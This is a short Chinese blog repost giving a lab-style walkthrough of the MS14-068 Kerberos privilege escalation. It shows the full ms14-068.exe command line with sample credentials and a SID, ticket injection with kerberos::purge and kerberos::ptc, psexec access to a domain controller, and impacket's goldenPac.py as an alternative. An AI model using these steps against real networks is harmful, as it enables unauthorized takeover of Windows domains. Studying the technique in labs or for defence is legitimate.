首页 > 其他 > 详细

MS14-068提权和impacket工具包提权

时间:2020-02-27 09:10:51      阅读:94      评论:0      收藏:0      [点我收藏+]

ms14-068提权

工具利用

a)拿下边界机win7,并已经有win7上任意一个账号的密码

-u 用户名@域

-p 用户密码

-s 用户sid

-d 域控

ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据

技术分享图片

导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据技术分享图片
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限

技术分享图片

impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本

 技术分享图片

注意@domain-host 指的是域控机的位置

技术分享图片

成功进入win08的命令行模式

MS14-068提权和impacket工具包提权

原文:https://www.cnblogs.com/simon7s/p/12370183.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!